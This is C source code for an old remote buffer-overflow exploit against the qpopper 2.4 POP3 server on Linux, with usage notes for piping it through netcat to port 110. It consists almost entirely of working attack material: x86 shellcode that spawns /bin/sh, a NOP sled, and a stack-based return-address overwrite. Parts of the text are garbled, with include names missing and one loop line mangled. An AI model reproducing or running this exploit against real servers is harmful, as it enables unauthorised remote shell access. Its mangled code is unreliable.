/* Exploit for qpopper 2.4 (and others) for Linux * by [WaR] (warchild@cryogen.com) and zav (zav@cryogen.com) * * usage: (./qpopper ;cat)|nc 110 * with offset around 1000 (try increments of 50) * * * shout outs to: Zef and YZF */ #include #include #define BUFFSIZE 998 char shell[] = "\xeb\x33\x5e\x89\x76\x08\x31\xc0" "\x88\x66\x07\x83\xee\x02\x31\xdb" "\x89\x5e\x0e\x83\xc6\x02\xb0\x1b" "\x24\x0f\x8d\x5e\x08\x89\xd9\x83" "\xee\x02\x8d\x5e\x0e\x89\xda\x83" "\xc6\x02\x89\xf3\xcd\x80\x31\xdb" "\x89\xd8\x40\xcd\x80\xe8\xc8\xff" "\xff\xff/bin/sh"; unsigned long esp() { __asm__(" movl %esp,%eax "); } main(int argc, char **argv) { int i,j,offset; unsigned long eip; char buffer[4096]; j=0; offset=atoi(argv[1]); eip=esp()+offset; for(i=0;i<1008;i++) buffer[i]=0x90; for(i=(BUFFSIZE - strlen(shell));i> 8) & 0xff; buffer[i+2]=(eip >> 16) & 0xff; buffer[i+3]=(eip >> 24) & 0xff; printf("%s\nsh -i\n",buffer); } /* www.hack.co.za [2000]*/